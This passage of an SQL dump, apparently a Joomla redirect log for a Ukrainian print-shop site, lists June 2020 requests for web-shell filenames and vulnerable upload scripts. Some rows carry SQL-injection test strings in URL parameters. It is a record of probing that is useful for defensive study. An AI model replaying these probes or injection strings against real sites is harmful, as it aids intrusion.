00:00:00',301),(16863,'https://ekvatorprint.com.ua/cache/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-16 05:36:19','0000-00-00 00:00:00',301),(16864,'https://ekvatorprint.com.ua/user/register/',NULL,'','',1,0,'2020-06-16 06:14:22','0000-00-00 00:00:00',301),(16865,'https://ekvatorprint.com.ua/xixi.php',NULL,'http://site.ru','',1,0,'2020-06-16 07:28:16','0000-00-00 00:00:00',301),(16866,'https://ekvatorprint.com.ua/wp-admin/network/sitenet.php5.suspected',NULL,'http://site.ru','',3,0,'2020-06-16 07:47:27','0000-00-00 00:00:00',301),(16867,'https://ekvatorprint.com.ua/assets/images/wp-plugins.php',NULL,'http://site.ru','',9,0,'2020-06-16 07:49:38','0000-00-00 00:00:00',301),(16868,'https://ekvatorprint.com.ua/cache/wp-plugins.php',NULL,'http://site.ru','',10,0,'2020-06-16 08:20:59','0000-00-00 00:00:00',301),(16869,'https://ekvatorprint.com.ua/timco-aero.com/cache/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-16 09:37:53','0000-00-00 00:00:00',301),(16870,'https://ekvatorprint.com.ua/wp-defence.php',NULL,'http://site.ru','',1,0,'2020-06-16 10:03:41','0000-00-00 00:00:00',301),(16871,'https://ekvatorprint.com.ua/assets/images/doc.php',NULL,'http://site.ru','',6,0,'2020-06-16 10:53:31','0000-00-00 00:00:00',301),(16872,'https://ekvatorprint.com.ua/templates/protostar/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-16 11:23:35','0000-00-00 00:00:00',301),(16873,'https://ekvatorprint.com.ua/_cache/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-16 11:56:44','0000-00-00 00:00:00',301),(16874,'https://ekvatorprint.com.ua/phpunit.xml',NULL,'','',1,0,'2020-06-16 12:51:36','0000-00-00 00:00:00',301),(16875,'https://ekvatorprint.com.ua/components/admin.php',NULL,'http://site.ru','',3,0,'2020-06-16 13:31:51','0000-00-00 00:00:00',301),(16876,'https://ekvatorprint.com.ua/templates/beez3/blackhat.php',NULL,'http://site.ru','',1,0,'2020-06-16 14:29:18','0000-00-00 00:00:00',301),(16877,'https://ekvatorprint.com.ua/assets/plugins/plupload/examples/upload.php',NULL,'http://www.google.com/','',2,0,'2020-06-16 15:13:55','0000-00-00 00:00:00',301),(16878,'https://ekvatorprint.com.ua/assets/plupload/examples/upload.php',NULL,'http://www.google.com/','',2,0,'2020-06-16 15:13:55','0000-00-00 00:00:00',301),(16879,'https://ekvatorprint.com.ua/assets/global/plugins/plupload/examples/upload.php',NULL,'http://www.google.com/','',2,0,'2020-06-16 15:13:56','0000-00-00 00:00:00',301),(16880,'https://ekvatorprint.com.ua/components/com_k2/helpers/drop.php',NULL,'http://site.ru','',1,0,'2020-06-16 16:16:56','0000-00-00 00:00:00',301),(16881,'https://ekvatorprint.com.ua/components/com_banners/helpers/images.php',NULL,'http://site.ru','',7,0,'2020-06-16 16:48:24','0000-00-00 00:00:00',301),(16882,'https://ekvatorprint.com.ua/plugins/content/upgrade.php',NULL,'http://site.ru','',4,0,'2020-06-16 19:27:17','0000-00-00 00:00:00',301),(16883,'https://ekvatorprint.com.ua/plugins/logo_img.php',NULL,'http://site.ru','',4,0,'2020-06-16 20:33:31','0000-00-00 00:00:00',301),(16884,'https://ekvatorprint.com.ua/media/bb.php',NULL,'http://site.ru','',3,0,'2020-06-16 20:34:58','0000-00-00 00:00:00',301),(16885,'https://ekvatorprint.com.ua/olad.php',NULL,'http://site.ru','',3,0,'2020-06-16 21:13:32','0000-00-00 00:00:00',301),(16886,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/r.php',NULL,'http://site.ru','',4,0,'2020-06-16 22:57:56','0000-00-00 00:00:00',301),(16887,'https://ekvatorprint.com.ua/libraries/joomla/template/midou.php',NULL,'http://site.ru','',1,0,'2020-06-17 00:03:46','0000-00-00 00:00:00',301),(16888,'https://ekvatorprint.com.ua/index2.php',NULL,'http://site.ru','',6,0,'2020-06-17 00:40:59','0000-00-00 00:00:00',301),(16889,'https://ekvatorprint.com.ua/discussion/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-06-17 01:17:37','0000-00-00 00:00:00',301),(16890,'https://ekvatorprint.com.ua/components/com_jooomlat/s.php',NULL,'http://site.ru','',2,0,'2020-06-17 01:53:22','0000-00-00 00:00:00',301),(16891,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content2121121121212.1',NULL,'','',1,0,'2020-06-17 02:13:32','0000-00-00 00:00:00',301),(16892,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content and 1=1',NULL,'','',2,0,'2020-06-17 02:13:34','0000-00-00 00:00:00',301),(16893,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content and 1>1',NULL,'','',1,0,'2020-06-17 02:13:35','0000-00-00 00:00:00',301),(16894,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content\' and \'x\'=\'x',NULL,'','',1,0,'2020-06-17 02:13:37','0000-00-00 00:00:00',301),(16895,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content\' and \'x\'=\'y',NULL,'','',1,0,'2020-06-17 02:13:38','0000-00-00 00:00:00',301),(16896,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content\" and \"x\"=\"x',NULL,'','',1,0,'2020-06-17 02:13:40','0000-00-00 00:00:00',301),(16897,'https://ekvatorprint.com.ua/index.php?view=article&id=17&itemid=18&option=com_content\" and \"x\"=\"y',NULL,'','',1,0,'2020-06-17 02:13:41','0000-00-00 00:00:00',301),(16898,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article2121121121212.1',NULL,'','',1,0,'2020-06-17 02:13:46','0000-00-00 00:00:00',301),(16899,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article and 1=1',NULL,'','',2,0,'2020-06-17 02:13:48','0000-00-00 00:00:00',301),(16900,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article and 1>1',NULL,'','',1,0,'2020-06-17 02:13:49','0000-00-00 00:00:00',301),(16901,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article\' and \'x\'=\'x',NULL,'','',1,0,'2020-06-17 02:13:51','0000-00-00 00:00:00',301),(16902,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article\' and \'x\'=\'y',NULL,'','',1,0,'2020-06-17 02:13:52','0000-00-00 00:00:00',301),(16903,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article\" and \"x\"=\"x',NULL,'','',1,0,'2020-06-17 02:13:54','0000-00-00 00:00:00',301),(16904,'https://ekvatorprint.com.ua/index.php?option=com_content&id=17&itemid=18&view=article\" and \"x\"=\"y',NULL,'','',1,0,'2020-06-17 02:13:55','0000-00-00 00:00:00',301),(16905,'https://ekvatorprint.com.ua/index.php?option=com_content&view=article&itemid=18&id=172121121121212.1',NULL,'','',1,0,'2020-06-17 02:14:00','0000-00-00 00:00:00',301),(16906,'https://ekvatorprint.com.ua/administrator/components/com_admin/controllers/simple.php5',NULL,'http://site.ru','',1,0,'2020-06-17 06:26:01','0000-00-00 00:00:00',301),(16907,'https://ekvatorprint.com.ua/anu.php',NULL,'http://site.ru','',3,0,'2020-06-17 07:31:30','0000-00-00 00:00:00',301),(16908,'https://ekvatorprint.com.ua/modules/mod_acepolls/helper.php',NULL,'http://site.ru','',1,0,'2020-06-17 08:08:26','0000-00-00 00:00:00',301),(16909,'https://ekvatorprint.com.ua/modules/mod_carramba/hours.php',NULL,'http://site.ru','',3,0,'2020-06-17 19:43:01','0000-00-00 00:00:00',301),(16910,'https://ekvatorprint.com.ua/administrator/components/com_ganalytics/libraries/jquery/class-wp-filesystemss.php',NULL,'http://site.ru','',1,0,'2020-06-17 20:19:50','0000-00-00 00:00:00',301),(16911,'https://ekvatorprint.com.ua/sheeel.php',NULL,'http://site.ru','',1,0,'2020-06-17 21:23:50','0000-00-00 00:00:00',301),(16912,'https://ekvatorprint.com.ua/shoes.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-17 21:44:15','0000-00-00 00:00:00',301),(16913,'https://ekvatorprint.com.ua/hours.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-17 22:25:48','0000-00-00 00:00:00',301),(16914,'https://ekvatorprint.com.ua/administrator/components/com_admin/controllers/class.php',NULL,'http://site.ru','',3,0,'2020-06-17 23:01:37','0000-00-00 00:00:00',301),(16915,'https://ekvatorprint.com.ua/administrator/head_img.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-17 23:31:18','0000-00-00 00:00:00',301),(16916,'https://ekvatorprint.com.ua/components/com_jce/editor/tiny_mce/plugins/inlinepopups/css/admin-class.php',NULL,'http://site.ru','',1,0,'2020-06-18 00:41:55','0000-00-00 00:00:00',301),(16917,'https://ekvatorprint.com.ua/components/com_weblinks/views/404.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-18 00:59:28','0000-00-00 00:00:00',301),(16918,'https://ekvatorprint.com.ua/components/com_foxcontact/sad.php',NULL,'http://site.ru','',1,0,'2020-06-18 02:08:52','0000-00-00 00:00:00',301),(16919,'https://ekvatorprint.com.ua/libraries/pear/archive_tar/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-18 02:37:02','0000-00-00 00:00:00',301),(16920,'https://ekvatorprint.com.ua/images/al.php.phpgif',NULL,'http://site.ru','',5,0,'2020-06-18 04:04:42','0000-00-00 00:00:00',301),(16921,'https://ekvatorprint.com.ua/conflg.php',NULL,'http://site.ru','',1,0,'2020-06-18 04:44:11','0000-00-00 00:00:00',301),(16922,'https://ekvatorprint.com.ua/wp-content.php',NULL,'http://site.ru','',2,0,'2020-06-18 06:04:51','0000-00-00 00:00:00',301),(16923,'https://ekvatorprint.com.ua/media/lux.php',NULL,'http://site.ru','',1,0,'2020-06-18 07:02:59','0000-00-00 00:00:00',301),(16924,'https://ekvatorprint.com.ua/postnewa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2020-06-18 07:03:55','0000-00-00 00:00:00',301),(16925,'https://ekvatorprint.com.ua/generationmap.php',NULL,'http://site.ru','',4,0,'2020-06-18 07:06:33','0000-00-00 00:00:00',301),(16926,'https://ekvatorprint.com.ua/__macosx/templates/protostar/html/layouts/joomla/form/field/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-18 09:48:29','0000-00-00 00:00:00',301),(16927,'https://ekvatorprint.com.ua/images/admin.php',NULL,'http://site.ru','',3,0,'2020-06-18 11:41:08','0000-00-00 00:00:00',301),(16928,'https://ekvatorprint.com.ua/cache/wp-info.php',NULL,'http://site.ru','',2,0,'2020-06-18 12:38:30','0000-00-00 00:00:00',301),(16929,'https://ekvatorprint.com.ua/images/headers/indeh.php',NULL,'http://site.ru','',1,0,'2020-06-18 12:58:59','0000-00-00 00:00:00',301),(16930,'https://ekvatorprint.com.ua/fx.php',NULL,'http://site.ru','',7,0,'2020-06-18 13:24:53','0000-00-00 00:00:00',301),(16931,'https://ekvatorprint.com.ua/administrator/v3.php',NULL,'http://site.ru','',1,0,'2020-06-19 06:25:01','0000-00-00 00:00:00',301),(16932,'https://ekvatorprint.com.ua/administrator/templates/system/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-19 09:30:47','0000-00-00 00:00:00',301),(16933,'https://ekvatorprint.com.ua/sherwoods.php',NULL,'http://site.ru','',1,0,'2020-06-19 09:55:14','0000-00-00 00:00:00',301),(16934,'https://ekvatorprint.com.ua/templates/system/html/index.php',NULL,'http://site.ru','',1,0,'2020-06-19 09:57:41','0000-00-00 00:00:00',301),(16935,'https://ekvatorprint.com.ua/layouts/wp-info.php',NULL,'http://site.ru','',3,0,'2020-06-19 11:13:25','0000-00-00 00:00:00',301),(16936,'https://ekvatorprint.com.ua/components/404.php',NULL,'http://site.ru','',2,0,'2020-06-19 11:19:02','0000-00-00 00:00:00',301),(16937,'https://ekvatorprint.com.ua/includes/dcomay.php',NULL,'http://site.ru','',2,0,'2020-06-19 12:29:24','0000-00-00 00:00:00',301),(16938,'https://ekvatorprint.com.ua/logs/data.php',NULL,'http://site.ru','',2,0,'2020-06-19 12:59:11','0000-00-00 00:00:00',301),(16939,'https://ekvatorprint.com.ua/libraries/phputf8/native/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-06-19 13:03:15','0000-00-00 00:00:00',301),(16940,'https://ekvatorprint.com.ua/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',3,0,'2020-06-19 13:29:32','0000-00-00 00:00:00',301),(16941,'https://ekvatorprint.com.ua/images/wp-info.php',NULL,'http://site.ru','',3,0,'2020-06-19 17:19:30','0000-00-00 00:00:00',301),(16942,'https://ekvatorprint.com.ua/revision/popup-pomo.php',NULL,'http://site.ru','',6,0,'2020-06-19 17:40:28','0000-00-00 00:00:00',301),(16943,'https://ekvatorprint.com.ua/tlnehbrubo.php',NULL,'http://site.ru','',2,0,'2020-06-19 17:45:37','0000-00-00 00:00:00',301),(16944,'https://ekvatorprint.com.ua/bypass.php',NULL,'http://site.ru','',8,0,'2020-06-19 18:08:32','0000-00-00 00:00:00',301),(16945,'https://ekvatorprint.com.ua/plugins/user/profile/ganks.php.php',NULL,'http://site.ru','',3,0,'2020-06-19 18:08:37','0000-00-00 00:00:00',301),(16946,'https://ekvatorprint.com.ua/administrator/templates/isis/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-19 18:13:52','0000-00-00 00:00:00',301),(16947,'https://ekvatorprint.com.ua/tmp/doc.php',NULL,'http://site.ru','',2,0,'2020-06-19 19:05:39','0000-00-00 00:00:00',301),(16948,'https://ekvatorprint.com.ua/administrator/search.class.php',NULL,'http://site.ru','',1,0,'2020-06-20 00:54:31','0000-00-00 00:00:00',301),(16949,'https://ekvatorprint.com.ua/cache/css.php',NULL,'http://site.ru','',4,0,'2020-06-20 04:00:47','0000-00-00 00:00:00',301),(16950,'https://ekvatorprint.com.ua/plugins/wp-info.php',NULL,'http://site.ru','',4,0,'2020-06-20 04:33:18','0000-00-00 00:00:00',301),(16951,'https://ekvatorprint.com.ua/xmlrpc/system_infos.php',NULL,'http://site.ru','',2,0,'2020-06-20 05:25:59','0000-00-00 00:00:00',301),(16952,'https://ekvatorprint.com.ua/cli/donttouch.php',NULL,'http://site.ru','',2,0,'2020-06-20 06:16:38','0000-00-00 00:00:00',301),(16953,'https://ekvatorprint.com.ua/components/com_tabulizer/assets/js/responsive/bag.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-20 06:21:11','0000-00-00 00:00:00',301),(16954,'https://ekvatorprint.com.ua/alf.php',NULL,'http://site.ru','',8,0,'2020-06-20 06:41:30','0000-00-00 00:00:00',301),(16955,'https://ekvatorprint.com.ua/wsi.php',NULL,'http://site.ru','',2,0,'2020-06-21 04:23:58','0000-00-00 00:00:00',301),(16956,'https://ekvatorprint.com.ua/administrator/components/com_mapyandex/assets/images/deficon/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 04:29:48','0000-00-00 00:00:00',301),(16957,'https://ekvatorprint.com.ua/ganks.php.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-21 05:26:47','0000-00-00 00:00:00',301),(16958,'https://ekvatorprint.com.ua/libraries/joomla/template/rice.php',NULL,'http://site.ru','',3,0,'2020-06-21 05:29:14','0000-00-00 00:00:00',301),(16959,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/admin/fr-fr/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-21 05:51:16','0000-00-00 00:00:00',301),(16960,'https://ekvatorprint.com.ua/media/media.php',NULL,'http://site.ru','',5,0,'2020-06-21 06:13:48','0000-00-00 00:00:00',301),(16961,'https://ekvatorprint.com.ua/web/assets/global/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2020-06-21 06:57:31','0000-00-00 00:00:00',301),(16962,'https://ekvatorprint.com.ua/web/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2020-06-21 06:57:32','0000-00-00 00:00:00',301),(16963,'https://ekvatorprint.com.ua/web/assets/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',1,0,'2020-06-21 06:57:33','0000-00-00 00:00:00',301),(16964,'https://ekvatorprint.com.ua/parseopmla/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-21 07:02:59','0000-00-00 00:00:00',301),(16965,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/doc.php',NULL,'http://site.ru','',2,0,'2020-06-21 07:03:07','0000-00-00 00:00:00',301),(16966,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/admin/en-gb/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-21 07:32:02','0000-00-00 00:00:00',301),(16967,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/site/it-it/htaccess.php',NULL,'http://site.ru','',3,0,'2020-06-21 07:57:39','0000-00-00 00:00:00',301),(16968,'https://ekvatorprint.com.ua/administrator/components/com_mapyandex/views/mapyandexajaxtask/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 08:31:15','0000-00-00 00:00:00',301),(16969,'https://ekvatorprint.com.ua/bitrix/admin/search.php',NULL,'','',3,0,'2020-06-21 08:43:23','0000-00-00 00:00:00',301),(16970,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/site/ru-ru/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 08:50:57','0000-00-00 00:00:00',301),(16971,'https://ekvatorprint.com.ua/olad.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-21 09:52:21','0000-00-00 00:00:00',301),(16972,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/sql/updates/sqlsrv/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-21 10:38:39','0000-00-00 00:00:00',301),(16973,'https://ekvatorprint.com.ua/doc.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-21 11:04:55','0000-00-00 00:00:00',301),(16974,'https://ekvatorprint.com.ua/layouts/joomla/system/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-06-21 11:09:38','0000-00-00 00:00:00',301),(16975,'https://ekvatorprint.com.ua/administrator/components/com_categories/views/categories/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 11:27:32','0000-00-00 00:00:00',301),(16976,'https://ekvatorprint.com.ua/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87.php',NULL,'http://site.ru','',5,0,'2020-06-21 11:31:27','0000-00-00 00:00:00',301),(16977,'https://ekvatorprint.com.ua/libraries/joomla/template/mark.php.suspected',NULL,'http://site.ru','',6,0,'2020-06-21 11:34:46','0000-00-00 00:00:00',301),(16978,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/site/de-de/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-21 11:37:49','0000-00-00 00:00:00',301),(16979,'https://ekvatorprint.com.ua/seomarket.php',NULL,'http://site.ru','',2,0,'2020-06-21 11:54:33','0000-00-00 00:00:00',301),(16980,'https://ekvatorprint.com.ua/wp-img.php',NULL,'http://site.ru','',8,0,'2020-06-21 11:55:24','0000-00-00 00:00:00',301),(16981,'https://ekvatorprint.com.ua/sitemps.php',NULL,'http://site.ru','',6,0,'2020-06-21 12:21:14','0000-00-00 00:00:00',301),(16982,'https://ekvatorprint.com.ua/cache/doc.php.suspected',NULL,'http://site.ru','',9,0,'2020-06-21 13:35:12','0000-00-00 00:00:00',301),(16983,'https://ekvatorprint.com.ua/libraries/joomla/utilities/iterator.php',NULL,'http://site.ru','',3,0,'2020-06-21 13:40:08','0000-00-00 00:00:00',301),(16984,'https://ekvatorprint.com.ua/test.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-21 14:03:08','0000-00-00 00:00:00',301),(16985,'https://ekvatorprint.com.ua/administrator/components/com_imageshow/language/site/ja-jp/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-21 14:25:29','0000-00-00 00:00:00',301),(16986,'https://ekvatorprint.com.ua/tmp/joomla.php',NULL,'http://site.ru','',2,0,'2020-06-21 14:27:37','0000-00-00 00:00:00',301),(16987,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/wp-plugins.php',NULL,'http://site.ru','',2,0,'2020-06-21 14:29:49','0000-00-00 00:00:00',301),(16988,'https://ekvatorprint.com.ua/wp-mial.php',NULL,'http://site.ru','',3,0,'2020-06-21 14:59:18','0000-00-00 00:00:00',301),(16989,'https://ekvatorprint.com.ua/components/com_foxcontact/c_2018.php',NULL,'http://site.ru','',1,0,'2020-06-21 15:16:08','0000-00-00 00:00:00',301),(16990,'https://ekvatorprint.com.ua/images/wp-blog.php',NULL,'http://site.ru','',4,0,'2020-06-21 15:20:32','0000-00-00 00:00:00',301),(16991,'https://ekvatorprint.com.ua/plugins/authentication/gmail/beautifu.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-21 16:10:14','0000-00-00 00:00:00',301),(16992,'https://ekvatorprint.com.ua/photo-album/sitemps.php',NULL,'http://site.ru','',1,0,'2020-06-21 16:11:39','0000-00-00 00:00:00',301),(16993,'https://ekvatorprint.com.ua/plugins/authentication/twatg.php',NULL,'http://site.ru','',1,0,'2020-06-21 16:11:42','0000-00-00 00:00:00',301),(16994,'https://ekvatorprint.com.ua/plugins/editors/codemirror/layouts/editors/codemirror/class.php',NULL,'http://site.ru','',2,0,'2020-06-21 16:19:06','0000-00-00 00:00:00',301),(16995,'https://ekvatorprint.com.ua/mw.php',NULL,'http://site.ru','',5,0,'2020-06-21 17:39:29','0000-00-00 00:00:00',301),(16996,'https://ekvatorprint.com.ua/modules/mod_roknavmenu/themes/default/js/wp-block.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-21 17:44:48','0000-00-00 00:00:00',301),(16997,'https://ekvatorprint.com.ua/plugins/djmediatools/folder/language/simple.php5',NULL,'http://site.ru','',2,0,'2020-06-21 17:45:28','0000-00-00 00:00:00',301),(16998,'https://ekvatorprint.com.ua/.git/logs/head',NULL,'','',1,0,'2020-06-22 18:03:27','0000-00-00 00:00:00',301),(16999,'https://ekvatorprint.com.ua/c0nfig.php',NULL,'','',5,0,'2020-06-25 02:26:01','0000-00-00 00:00:00',301),(17000,'https://ekvatorprint.com.ua/images/xxx.php',NULL,'','',3,0,'2020-06-25 17:47:07','0000-00-00 00:00:00',301),(17001,'https://ekvatorprint.com.ua/modules/mod_maximenuck/assets/svggradient/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 04:44:06','0000-00-00 00:00:00',301),(17002,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/xun.php',NULL,'http://site.ru','',2,0,'2020-06-27 05:17:04','0000-00-00 00:00:00',301),(17003,'https://ekvatorprint.com.ua/modules/mod_maximenuck/themes/default/images/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 05:19:32','0000-00-00 00:00:00',301),(17004,'https://ekvatorprint.com.ua/plugins/content/widgetkit/streamed.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 05:46:23','0000-00-00 00:00:00',301),(17005,'https://ekvatorprint.com.ua/modules/mod_fxprev/libraries/ganks.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 06:16:06','0000-00-00 00:00:00',301),(17006,'https://ekvatorprint.com.ua/modules/mod_tags_popular/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 06:18:57','0000-00-00 00:00:00',301),(17007,'https://ekvatorprint.com.ua/plugins/djmediatools/djclassifieds/language/gank.php.php',NULL,'http://site.ru','',2,0,'2020-06-27 06:19:27','0000-00-00 00:00:00',301),(17008,'https://ekvatorprint.com.ua/modules/mod_login/w.php',NULL,'http://site.ru','',2,0,'2020-06-27 06:20:53','0000-00-00 00:00:00',301),(17009,'https://ekvatorprint.com.ua/modules/mod_languages/tmpl/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 06:50:40','0000-00-00 00:00:00',301),(17010,'https://ekvatorprint.com.ua/language/es-es/ob.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 07:22:08','0000-00-00 00:00:00',301),(17011,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/lux.php',NULL,'http://site.ru','',1,0,'2020-06-27 07:26:03','0000-00-00 00:00:00',301),(17012,'https://ekvatorprint.com.ua/mrspy.php',NULL,'http://site.ru','',2,0,'2020-06-27 07:57:14','0000-00-00 00:00:00',301),(17013,'https://ekvatorprint.com.ua/paypal/wp-cofigs.php',NULL,'http://site.ru','',2,0,'2020-06-27 08:28:49','0000-00-00 00:00:00',301),(17014,'https://ekvatorprint.com.ua/layouts/404.php',NULL,'http://site.ru','',1,0,'2020-06-27 08:33:54','0000-00-00 00:00:00',301),(17015,'https://ekvatorprint.com.ua/modules/mod_roknavmenu/themes/default/index.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 08:57:39','0000-00-00 00:00:00',301),(17016,'https://ekvatorprint.com.ua/parseopml/wp-cofigs.php',NULL,'http://site.ru','',2,0,'2020-06-27 09:27:39','0000-00-00 00:00:00',301),(17017,'https://ekvatorprint.com.ua/modules/mod_latestdiscussion/tmpl/ix.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 10:05:17','0000-00-00 00:00:00',301),(17018,'https://ekvatorprint.com.ua/modules/mod_maximenuck/themes/default/css/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 10:06:17','0000-00-00 00:00:00',301),(17019,'https://ekvatorprint.com.ua/modules/mod_related_items/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-27 10:08:08','0000-00-00 00:00:00',301),(17020,'https://ekvatorprint.com.ua/oude/wp-content/themes/jasmijnbul/single-help.php',NULL,'http://site.ru','',1,0,'2020-06-27 10:36:25','0000-00-00 00:00:00',301),(17021,'https://ekvatorprint.com.ua/modules/mod_bt_simple_slideshow/tmpl/images/data.php',NULL,'http://site.ru','',1,0,'2020-06-27 10:38:05','0000-00-00 00:00:00',301),(17022,'https://ekvatorprint.com.ua/old/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:23:44','0000-00-00 00:00:00',301),(17023,'https://ekvatorprint.com.ua/libraries/joomla/html/parameter/element/.readme.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:49:13','0000-00-00 00:00:00',301),(17024,'https://ekvatorprint.com.ua/libraries/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 13:50:19','0000-00-00 00:00:00',301),(17025,'https://ekvatorprint.com.ua/libraries/cms/form/beautifu.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:51:04','0000-00-00 00:00:00',301),(17026,'https://ekvatorprint.com.ua/media/editors/tinymce/skins/lightgray/fonts/xixi.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 13:51:17','0000-00-00 00:00:00',301),(17027,'https://ekvatorprint.com.ua/wp-snapshots/wp-caches.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:52:05','0000-00-00 00:00:00',301),(17028,'https://ekvatorprint.com.ua/templates/protostar/css/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:52:13','0000-00-00 00:00:00',301),(17029,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/js/simpleside.php5',NULL,'http://site.ru','',1,0,'2020-06-27 13:52:43','0000-00-00 00:00:00',301),(17030,'https://ekvatorprint.com.ua/media/system/wp.php',NULL,'http://site.ru','',2,0,'2020-06-27 13:52:54','0000-00-00 00:00:00',301),(17031,'https://ekvatorprint.com.ua/os.php',NULL,'http://site.ru','',1,0,'2020-06-27 13:55:23','0000-00-00 00:00:00',301),(17032,'https://ekvatorprint.com.ua/tmp/sllolx.php',NULL,'http://site.ru','',1,0,'2020-06-27 14:18:46','0000-00-00 00:00:00',301),(17033,'https://ekvatorprint.com.ua/layouts/index4.php',NULL,'http://site.ru','',1,0,'2020-06-27 14:27:14','0000-00-00 00:00:00',301),(17034,'https://ekvatorprint.com.ua/wso.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 14:27:49','0000-00-00 00:00:00',301),(17035,'https://ekvatorprint.com.ua/jquery-validation/combo.php',NULL,'http://site.ru','',2,0,'2020-06-27 14:28:57','0000-00-00 00:00:00',301),(17036,'https://ekvatorprint.com.ua/js/js/data.php',NULL,'http://site.ru','',3,0,'2020-06-27 14:48:30','0000-00-00 00:00:00',301),(17037,'https://ekvatorprint.com.ua/libraries/fof/model/behavior/.h..php',NULL,'http://site.ru','',2,0,'2020-06-27 15:00:33','0000-00-00 00:00:00',301),(17038,'https://ekvatorprint.com.ua/libraries/joomla/base/feal.php',NULL,'http://site.ru','',1,0,'2020-06-27 15:26:20','0000-00-00 00:00:00',301),(17039,'https://ekvatorprint.com.ua/templates/beez5/index.php.backup',NULL,'http://site.ru','',1,0,'2020-06-27 15:26:36','0000-00-00 00:00:00',301),(17040,'https://ekvatorprint.com.ua/libraries/joomla/template/module/modifier/hell.php',NULL,'http://site.ru','',1,0,'2020-06-27 15:30:05','0000-00-00 00:00:00',301),(17041,'https://ekvatorprint.com.ua/media/media/images/white.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-27 15:57:37','0000-00-00 00:00:00',301),(17042,'https://ekvatorprint.com.ua/libraries/openid/auth/feal.php',NULL,'http://site.ru','',3,0,'2020-06-27 15:58:39','0000-00-00 00:00:00',301),(17043,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/langs/feter.php',NULL,'http://site.ru','',1,0,'2020-06-27 